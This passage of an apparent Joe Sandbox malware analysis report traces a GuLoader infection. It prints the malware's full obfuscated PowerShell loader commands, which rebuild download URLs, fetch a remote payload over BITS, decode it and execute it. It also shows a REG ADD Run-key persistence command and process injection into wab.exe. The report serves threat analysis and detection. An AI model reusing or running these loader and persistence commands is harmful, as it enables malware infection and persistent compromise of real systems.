prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr 
Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents $Havartis;} else {;$Chlorocarbon216=quenchlessness ' Net,SHj,pet MedmaAcoelr ThiotGal.e-Svi.eBDe.atiBindet M,dosRe.rsTo.sporOmentaud ign WennssynkrfUnmete Kalvr Ungo ompa-DialeS andlo Kon uForgir SkrucHypoceulovl P,eud$ BramPMiscolL,stoa,turtnCronetSo nee mutts EnerkSfa toMetrolNu bieStenbssalgs Langt- onfiDMaddieVejrfs Gr,ot A cuiUnmagnGld sa kalktNoniniGenopoKo.lenIntra A,try$HagbaVGrappa ProrlU,thusGermaeNonobn T.ibdAfskreGuar sRecid ';&($Affattendes62) (quenchlessness 'Zyg e$ PoluVEnganaT.rsklNongesPellaeRu lenMi.jpdF rgaeErot.sPrint= Abst$F.rtreTortsnSprinvC,ank: errea.hrespnosogpSpoond ZimbasyncrtBe fiaAccru ') ;&($Affattendes62) (quenchlessness 'Ov.rjIShaham Fo.ypStalloGli.mrU,nmatXenop- algdMTechnoKonced Kamau.sesilCelureBond. 
Da,otBOpkl.i BefutSprngsKomp,Ttelepr mortaAppr n.angesimputfKlendeseg.erKi.de ') ;$Valsendes=$Valsendes+'\Ototoxicity.Non';while (-not $Rkenlandskaben) {&($Affattendes62) (quenchlessness 'Delsa$.esegRBi inkLngdeeKnowln skollArendaVinklnUnsatdGe.tisbaggrkSlak aCorribSero.eAgternOv.rs=.yncy( CounTPrinte Senes Ov rtFyldn-Almg PAsy,paMisiotIn xthKo si Fjedd$ SkolVEnsn,aKampulBladlsTunneeSprinnSecredGradae Af lsG,rlo)Coker ') ;&($Affattendes62) $Chlorocarbon216;&($Affattendes62) (quenchlessness 'Un.erSdyspntBeaklaTilpar Antithawks-ModarSbaadelUprigeCentieFre,tpPr.ff itu5Tippl ');$Planteskoles=$Udenrigsredaktrerne[$havbiologers++%$Udenrigsredaktrerne.count];}&($Affattendes62) (quenchlessness 'Aaben$FigurFKomonrPr.fuiInt.rf O eruIm acnSnorsdUntainKrafteKasersTingf2Smin,4Unswa9David Rette=,deno MurziGDeponemultitAchie-MalacCDarneo StranflyvetrisoteGar enIncudtFremg Foru$filkaVViatiaC mmulStinks PhyleforannAareldSkovle Holos,mmet ');&($Affattendes62) (quenchlessness 'Krema$overaMAbiogaChapalBasibgDybvarGallo Folke=Pyrom Tegne[ForskSjeopay Spagsoff,ntLolloe,rabamMisch.Is,gaCFolksoAnlben DissvLertjeTenibr hirtMetro]Uls.e: Mark:SitopFLandbrhypoho Col,mDioptBA tena Ordas Fo,ee Tyra6 Opsk4T lsaS.ejret G llrUnmaniAccr.nAutocgPhili(Ecoci$CamphF.palsrPhotoiSupe,fIndf uHalvdn DansdU,rulnAnticeAftvts Ret 2Fi te4Neotr9Kro.s) Onyc ');&($Affattendes62) (quenchlessness ' yclo$EpaxiUToughnTolu,dConsooPa donUdkaneDecol2di,ul3 Hk.e9Arbej G.nbr=,vlst Blenn[Fde,aSRubleyFabr.sConsitl.teleTcku mExpec. S.ooT SkrieMoriaxDrumltArcht.Spor E Stten LadycKejseoBarord.usleiSte snEmajagUrefl]Forms:Preen:,ipefAPastoSe sprC,oculIHomoeIextre. 
KirkGBarbie,tatutArchnS lpert endirKraveiSurf.n,edisg Cock(.kabe$BalleMEffekaHallml AmphgnothirMaidl) ,obb ');&($Affattendes62) (quenchlessness 'ambys$ onjuDB.omci Pa,tmPremieinfrat NotorHvemao nspndFrankoHoftenUnimp=Fores$HylomUHoundnJingadUnhomoBanden ente necd2 Cr,m3Bors,9Bolig.T uthsUdvalu A tib TrdnsN.nnit.oredrPackwi Gennn RdsegVitia(Longe3Verg 3Polyp6 Nvni5Korre4.hedt7Brahm,Upcra2.arru5 Incu8He.od1Hypo 8Mod,m)Decel ');&($Affattendes62) $Dimetrodon;}
                                                        Imagebase:0x7ff7be880000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:08:07:21
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:08:07:23
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr 
Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents $Havartis;} else {;$Chlorocarbon216=quenchlessness ' Net,SHj,pet MedmaAcoelr ThiotGal.e-Svi.eBDe.atiBindet M,dosRe.rsTo.sporOmentaud ign WennssynkrfUnmete Kalvr Ungo ompa-DialeS andlo Kon uForgir SkrucHypoceulovl P,eud$ BramPMiscolL,stoa,turtnCronetSo nee mutts EnerkSfa toMetrolNu bieStenbssalgs Langt- onfiDMaddieVejrfs Gr,ot A cuiUnmagnGld sa kalktNoniniGenopoKo.lenIntra A,try$HagbaVGrappa ProrlU,thusGermaeNonobn T.ibdAfskreGuar sRecid ';&($Affattendes62) (quenchlessness 'Zyg e$ PoluVEnganaT.rsklNongesPellaeRu lenMi.jpdF rgaeErot.sPrint= Abst$F.rtreTortsnSprinvC,ank: errea.hrespnosogpSpoond ZimbasyncrtBe fiaAccru ') ;&($Affattendes62) (quenchlessness 'Ov.rjIShaham Fo.ypStalloGli.mrU,nmatXenop- algdMTechnoKonced Kamau.sesilCelureBond. 
Da,otBOpkl.i BefutSprngsKomp,Ttelepr mortaAppr n.angesimputfKlendeseg.erKi.de ') ;$Valsendes=$Valsendes+'\Ototoxicity.Non';while (-not $Rkenlandskaben) {&($Affattendes62) (quenchlessness 'Delsa$.esegRBi inkLngdeeKnowln skollArendaVinklnUnsatdGe.tisbaggrkSlak aCorribSero.eAgternOv.rs=.yncy( CounTPrinte Senes Ov rtFyldn-Almg PAsy,paMisiotIn xthKo si Fjedd$ SkolVEnsn,aKampulBladlsTunneeSprinnSecredGradae Af lsG,rlo)Coker ') ;&($Affattendes62) $Chlorocarbon216;&($Affattendes62) (quenchlessness 'Un.erSdyspntBeaklaTilpar Antithawks-ModarSbaadelUprigeCentieFre,tpPr.ff itu5Tippl ');$Planteskoles=$Udenrigsredaktrerne[$havbiologers++%$Udenrigsredaktrerne.count];}&($Affattendes62) (quenchlessness 'Aaben$FigurFKomonrPr.fuiInt.rf O eruIm acnSnorsdUntainKrafteKasersTingf2Smin,4Unswa9David Rette=,deno MurziGDeponemultitAchie-MalacCDarneo StranflyvetrisoteGar enIncudtFremg Foru$filkaVViatiaC mmulStinks PhyleforannAareldSkovle Holos,mmet ');&($Affattendes62) (quenchlessness 'Krema$overaMAbiogaChapalBasibgDybvarGallo Folke=Pyrom Tegne[ForskSjeopay Spagsoff,ntLolloe,rabamMisch.Is,gaCFolksoAnlben DissvLertjeTenibr hirtMetro]Uls.e: Mark:SitopFLandbrhypoho Col,mDioptBA tena Ordas Fo,ee Tyra6 Opsk4T lsaS.ejret G llrUnmaniAccr.nAutocgPhili(Ecoci$CamphF.palsrPhotoiSupe,fIndf uHalvdn DansdU,rulnAnticeAftvts Ret 2Fi te4Neotr9Kro.s) Onyc ');&($Affattendes62) (quenchlessness ' yclo$EpaxiUToughnTolu,dConsooPa donUdkaneDecol2di,ul3 Hk.e9Arbej G.nbr=,vlst Blenn[Fde,aSRubleyFabr.sConsitl.teleTcku mExpec. S.ooT SkrieMoriaxDrumltArcht.Spor E Stten LadycKejseoBarord.usleiSte snEmajagUrefl]Forms:Preen:,ipefAPastoSe sprC,oculIHomoeIextre. 
KirkGBarbie,tatutArchnS lpert endirKraveiSurf.n,edisg Cock(.kabe$BalleMEffekaHallml AmphgnothirMaidl) ,obb ');&($Affattendes62) (quenchlessness 'ambys$ onjuDB.omci Pa,tmPremieinfrat NotorHvemao nspndFrankoHoftenUnimp=Fores$HylomUHoundnJingadUnhomoBanden ente necd2 Cr,m3Bors,9Bolig.T uthsUdvalu A tib TrdnsN.nnit.oredrPackwi Gennn RdsegVitia(Longe3Verg 3Polyp6 Nvni5Korre4.hedt7Brahm,Upcra2.arru5 Incu8He.od1Hypo 8Mod,m)Decel ');&($Affattendes62) $Dimetrodon;}
                                                        Imagebase:0xac0000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2804880582.0000000008BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2804900033.0000000008CCE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:08:07:26
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                        Imagebase:0x7ff7e52b0000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:9
                                                        Start time:08:08:03
                                                        Start date:18/03/2024
                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe
                                                        Imagebase:0xcf0000
                                                        File size:516'608 bytes
                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:10
                                                        Start time:08:08:14
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs"
                                                        Imagebase:0xda0000
                                                        File size:147'456 bytes
                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:08:08:14
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:08:08:14
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:08:08:14
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)"
                                                        Imagebase:0x20000
                                                        File size:59'392 bytes
                                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:08:08:15
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x180000
                                                        File size:418'304 bytes
                                                        MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:15
                                                        Start time:08:08:26
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Cabinetted;++$Cabinetted;$Cabinetted=$Cabinetted-1;Function Cert69 ($Forretningsnavn){$Halvmaanedliges=5;$Halvmaanedliges++;For($Phylloscopine81=5; $Phylloscopine81 -lt $Forretningsnavn.Length-1; $Phylloscopine81+=$Halvmaanedliges){$Foreadapt = 'substring';$Slyngblte=$Forretningsnavn.$Foreadapt.Invoke($Phylloscopine81, 1);$Olfactible=$Olfactible+$Slyngblte}$Olfactible;}$uppishness=Cert69 'HypochfavnttDep.ct EkstpEl.dys Bowl: Libe/Snebo/Mornem IndiaBurnes DoomoOverl.ArmatgPolypeProj./ DesiwBeeswp Carp- Pr.va ygnid PanemEtaari AcrinFarad/KlassRT lkue BestcCompriResult Do seKartorKvi,keSupert Havo.Brn erVirusa Other In e ';$Wergilds=$uppishness.split([char]62);$uppishness=$Wergilds[0];$Batiste=Cert69 ' ForeiJurateAk hexMsurk ';$Sjusglas = Cert69 ' Lsni\ CymesNig eyVrtdys RediwNephroNuss wP.eud6Lymph4 Synt\havarWTan aicarponSam rdPol ro Dic.wIonpasAcardPResgso Arguw ReseeAnde rIndseS Frath sarceOmhyglPledglSeric\D plavSrdom1 .ytr.Rekur0St,ld\RepatpAlcoroskarpwUnorte,nglerUnagisIn.erhWifieeBlokel Flo.leuphe.NumereS.irixR,inoeParal ';&($Batiste) (Cert69 'Sterr$SkrivSAllo e Po.ykFe.lmsPos.tt Uncou Di.lr VrkssArgen=.onde$Ps.cheEpit.nBog nvTrla :m.ltew SbefiStrrenJ,rntd.amilisvrvgrGamet ') ;&($Batiste) (Cert69 'Askeb$Ra,gsS Cab,j O,gouSterss hiocgLarl.l GasbaAssems Per,=Cinqu$SarcoSVaabeeLit.ukUnm.nsRetintcompuuSkri,r luttsHanhu+Fravl$RelegS ndejSicyouPropos SplagmildelCr ssaFrotts S.rv ') ;&($Batiste) (Cert69 'Wayl,$CensuL LangeUnme.a llefCimb,wSilkeoBlderrAndelm ntes Fl.e Doku=Unrep Vexed(Afmel( ImaggTomhjwBagtrmHana.i Ev.n KursuwbortviProclnUdkrn3Uover2N.npa_Chinkp DietrJoggioOccupc DetoeDemensPseudsAxost propa-O.bytFLunyi IsoenPSeriorUnhypoTranscHatcheB,shbsolofss ubveItraved Appr=F.rre$Under{EthicP.unstI PhaeDUnpud}tvang),isco.TegucCAntaloU dermA socmP.digaF rtinmelildUkvemLAerosi OxygnChloreGitt.)Downh Boble-contrsUnnimp enetlWe biiUndert 
enfe Payi [Sleigc Ari,hBet aaSkkevr Acid]Un.in3Gevin4 opfi ');&($Batiste) (Cert69 'Krybe$ kretFHomofeRekrnmPol.ttAflydemil in TescaAudioaScenarConnis Kond Til =Disin Angli$Fu,dsL.isexeKontraSold,f KvalwChacro BrygrKaeftmCr.tisArr y[Krysa$ juniLnyanseByggea Sho,fLegemwimpoloVidtlrLakfamDuniesQ,adr.Quak cRespeoA.rusu onen,omictFerth- omkl2C,omp]Erst, ');&($Batiste) (Cert69 ' Unde$ .ircFbraysaKragesKmpehe UnstrBrystuTransmHoved= rrie( AdskT QualeAfgrssIntertUitot-Ra.urP.ompaaCrotctRegnsh npac Semit$c,ltoSDeaccj Tostu,rylls Udskg pseulFalbyaEncrysLi,id)Cereb N.rve-Kam.eA DrifnApperdS.alc Fu te(B.lan[SymboI Oro n ronatBrom,PkvalitScurrrNonfr]Uorga:Toba.:B.ithsUbevgi Forsz SquaeP,eud Scarl-Leucoe .illqCorad Distr8Palli)Manip ') ;if ($Faserum) {.$Sjusglas $Femtenaars;} else {;$Thysen=Cert69 'Ant.cSKogeptReaccaFysiorUnschtCalli-Ing.oBSengei,ircut FrdesSinusTTresirFicu.aCabbanQuonssHjem.f Melle.rbitr Hvae Verti- FidgSStemmoRgto,uWulfer FordcPernieGudst Fors $Unpa,uNitnipHybripDig eiLilyas SherhAlbatn.ibboeScarfsBefips.iljg Skink-LagerDCuiraeSamfusLap,etI dumiPri mnLarynaRecont SquaiFlybloAlfefn Coun Chif$TelluSBes.retaarek SpkhsSagtetHesteuF rarrWla,isDiner ';&($Batiste) (Cert69 'Re ri$ StanSSpdeke Kni.kPortesTrkpltB,ctruLuminrHemiesNubig=Offen$Totrie Burenopis.vFuld :.onpaaBlindpSvi.rpI jekd ,runaGuld.tSmanda,ille ') ;&($Batiste) (Cert69 'SerbiIIndifmE,erepskn,eo Foger Mongt Reci-.urtiMreat.o Tilsd DomeuA frel H.nde Fang Na urBKontriLy,tet Lic sMa,moTLoamir,niataUdkonnU.trasTirvef SrsteBole.rBenzy ') ;$Seksturs=$Seksturs+'\Hovedbygningens.Cou';while (-not $Afmonteringernes) {&($Batiste) (Cert69 'Sikke$TrskoASter fMonopmNondeocurionmu.hntCopreeFr turFiltriToftenNyskrgSyn.heCenterSkuldnSippeetennisNedlu= anre(DecasT ForheForelsR,tratAffa - Le,uP TranaNasc.t An shTomle Perif$ Fir,SKldereDeci.kVej.es undktUnferuTast rSelvrsSlagt)V kat ') ;&($Batiste) $Thysen;&($Batiste) (Cert69 'sawloS Desst FamiaChartrforhot utro-AliamS Lokol SitheCo leeGlarrp Ga.t Jamn 5Preba 
');$uppishness=$Wergilds[$Sureste++%$Wergilds.count];}&($Batiste) (Cert69 ' Trg $pulveNTreaceLyriccLin.etCanguaFortrn Thead SvanrB gflaPhoto Nyord= Pred UdkldGBrndseFritnt rako-Un,bsCDunstoMillinConcrt Cu iemikron mo.utstart Lykke$DomicSAspise ohorkgalsisK,rdutPe aluOutscr Jos s ovtr ');&($Batiste) (Cert69 'Ref,o$ Vel,oTittemDom,rk.ovieaFritir,epart Trife S.lirSeni,iKalibnSkaktgStikbs Com koler=Kreat rave[Un orSKreplyDiebasAfvejtAnsige San,mfor.o.OppugCUn eco .vern StenvSi,dse InsnrkreretSkoss]Ninet:tale,:ArvelFWaughr Cravo Jen mOn chBSkralaRh.pis usikeDiol,6Phone4 Typ.SEksamtXyl,prZoneliPar enSe.ilgShant( Medu$SolvoNForedeAurigcSlit,tFo.vaaS attnTraildUnlovr EpidaDatab) Reko ');&($Batiste) (Cert69 'Lugma$ SampN FotooO igonTvet,p Co neVenesrSlamsvLnklaeSekserCist sPolytiEnfolv UltreEfter Indre=Marke B au[RdbysSMi.veyUnltrsSoaprtMasteeEl.omm Harp.FliseTSummeeBellyxRefo,tSc,em.Sep,eEM.veon Se icSetulo HeksdRedisiP.llinTjensg un e] Li,e: udhn: ApteAMom nSPokalCka.toISpindIFl.gt..ademGberhyeAdelhtEyehoS rabtCountrHuishiDetacnC,olegQueth(gesti$Vrdiso SamsmOxysakSorteaPenolrPassetOplsneSlv irCoenai BedenBelasg Multsbarne)P,cti ');&($Batiste) (Cert69 'Alcor$AmalgJForkaoHouopg OvergTrlleiAnme,nRo.kegUnivet naarjInfan=Anstt$Und,rNB.rnao Waganpa ajpVenskeImpotrChildv CoeleMonolrVinifs bliti,rawevDdelieArgen.B,lbosS,badu,alambLi.fas PolktInfierEpipai,ransnInforgRadbr( Sej.2Taman9Las,r6Sprre5 Cl,i3 Bamb1Nachs,Tyros2Lakmu5 Ga e8 Stje7 ider3 ord)O.fic ');&($Batiste) $Joggingtj;}
                                                        Imagebase:0xac0000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:08:08:26
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:17
                                                        Start time:08:08:58
                                                        Start date:18/03/2024
                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                        Wow64 process (32bit):
                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe
                                                        Imagebase:
                                                        File size:516'608 bytes
                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                        Has elevated privileges:
                                                        Has administrator privileges:
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6caad8173feda806a4b0669e2a0d592a1c011cb0401639163e1788fb2a03e5f
                                                          • Instruction ID: 193080e9a2b9f7200e663c366d64a1893ce556ef4ede588e376917bb47fd2b05
                                                          • Opcode Fuzzy Hash: f6caad8173feda806a4b0669e2a0d592a1c011cb0401639163e1788fb2a03e5f
                                                          • Instruction Fuzzy Hash: 8CB13EB0E002098FDF10DFB9D98579DBBF2AF88718F14C529D81AE7294EB749945CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 845l$845l$845l$845l$845l$845l$tPeq$tPeq$tPeq$tPeq
                                                          • API String ID: 0-539280492
                                                          • Opcode ID: b0e3bfcda09ce8def92557f5d79b3c3eed4a9b3b3799ec85161bd10b03466995
